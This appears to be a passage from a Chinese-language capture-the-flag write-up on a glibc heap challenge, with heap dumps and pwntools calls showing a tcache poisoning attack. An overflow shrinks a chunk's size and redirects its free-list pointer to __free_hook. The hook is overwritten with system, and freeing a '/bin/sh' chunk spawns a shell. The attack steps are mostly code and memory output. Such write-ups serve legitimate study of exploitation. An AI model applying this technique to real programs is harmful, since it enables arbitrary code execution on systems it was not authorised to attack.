0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081 <--- chunk C
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252 <--- fake chunk
0x56257ccda7c0: 0x0000000000000330  0x0000000000000060
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

然后getshell

create(0,0x10,b'aAA')
create(0,0x40, b'VVV')

堆地址:

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D. Free
0x56257ccda2a0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2b0: 0x0000000000000000  0x0000000000000051 <--- chunk E. Malloc
0x56257ccda2c0: 0x0000000000565656  0x0000000000000000
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <--- chunk F. Free
0x56257ccda310: 0x0000000000000000  0x000056257ccda010
0x56257ccda320: 0x0000000000000000  0x0000000000000000
0x56257ccda330: 0x0000000000000000  0x0000000000000000
0x56257ccda340: 0x0000000000000000  0x0000000000000000
0x56257ccda350: 0x0000000000000000  0x0000000000000000
0x56257ccda360: 0x0000000000000000  0x0000000000000000
0x56257ccda370: 0x0000000000000000  0x0000000000000000
0x56257ccda380: 0x0000000000000000  0x0000000000000000
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1

然后还利用下溢

payload = 0x80 * b'B' <--- 128 Bs to overflow char
payload += p64(0)
payload += p64(0x21) <--- size of D. We leave it as it was
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0x21) <--- size of E. We change it from 0x51 to 0x21
create(0,0x90,payload) <--- chunk F from tcache

修改后

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D. Free
0x56257ccda2a0: 0x0000000000000000  0x0000000000000000
0x56257ccda2b0: 0x0000000000000000  0x0000000000000021 <--- chunk E. Free
0x56257ccda2c0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <--- chunk F. Malloc
0x56257ccda310: 0x4242424242424242  0x4242424242424242
0x56257ccda320: 0x4242424242424242  0x4242424242424242
0x56257ccda330: 0x4242424242424242  0x4242424242424242
0x56257ccda340: 0x4242424242424242  0x4242424242424242
0x56257ccda350: 0x4242424242424242  0x4242424242424242
0x56257ccda360: 0x4242424242424242  0x4242424242424242
0x56257ccda370: 0x4242424242424242  0x4242424242424242
0x56257ccda380: 0x4242424242424242  0x4242424242424242
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1

这个时候chunk E(size已被改成0x21)还在tcache[0x50]里, chunk D在tcache[0x20]里(从上面的dump看, 下溢写入的p64(0)顺带把D的fd清成了0)。先把E malloc回来再free, 它就会按新的size进入tcache[0x20], 排在D前面; 再把chunk F(0xa0)申请回来, 再次利用下溢把E的fd改成__free_hook。
这样, tcache[0x20]的链表原本是E->D, 变成了E->__free_hook。
如图为修改过后的

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D. Free
0x56257ccda2a0: 0x0000000000000000  0x0000000000000000 
0x56257ccda2b0: 0x0000000000000000  0x0000000000000021 <--- chunk E. Free. Poisoned with __free_hook
0x56257ccda2c0: 0x00007f6a2f4b0e70  0x000056257ccda000
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <-- chunk F. Malloc
0x56257ccda310: 0x4242424242424242  0x4242424242424242
0x56257ccda320: 0x4242424242424242  0x4242424242424242
0x56257ccda330: 0x4242424242424242  0x4242424242424242
0x56257ccda340: 0x4242424242424242  0x4242424242424242
0x56257ccda350: 0x4242424242424242  0x4242424242424242
0x56257ccda360: 0x4242424242424242  0x4242424242424242
0x56257ccda370: 0x4242424242424242  0x4242424242424242
0x56257ccda380: 0x4242424242424242  0x4242424242424242
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1

接着malloc两次: 第一次从tcache[0x20]拿到E, 第二次就拿到__free_hook, 往里写system的地址。然后create一个内容为"/bin/sh"的chunk, 之后再输入1(create)和index 0, create开头的free(chnk[0])就会变成system("/bin/sh")。注意create总是先free再malloc: 写完__free_hook之后的那次create(0,0x90)也会先free一次chnk[0], 而此时chnk[0]指向的就是__free_hook本身, hook会先以这个地址为参数被触发一次, 真正拿shell的是最后那次free。

create(0,0x10,b'RRRR') <--- malloc E from tcache
reset(0) <--- reset the pointer so E does not get freed
create(0,0x10,p64(system)) <--- malloc __free_hook. Overwrite it with system
# create a 0x90 chunk holding "/bin/sh\0"; freeing it is what spawns the shell

create(0,0x90,b"/bin/sh")<--- we will free this chunk to get a shell
#create(0,0xe,"heheshel")

p.sendline('1')<--- just call create again to trigger free
p.sendline('0')<--- send index 0 

p.interactive()

getshell!
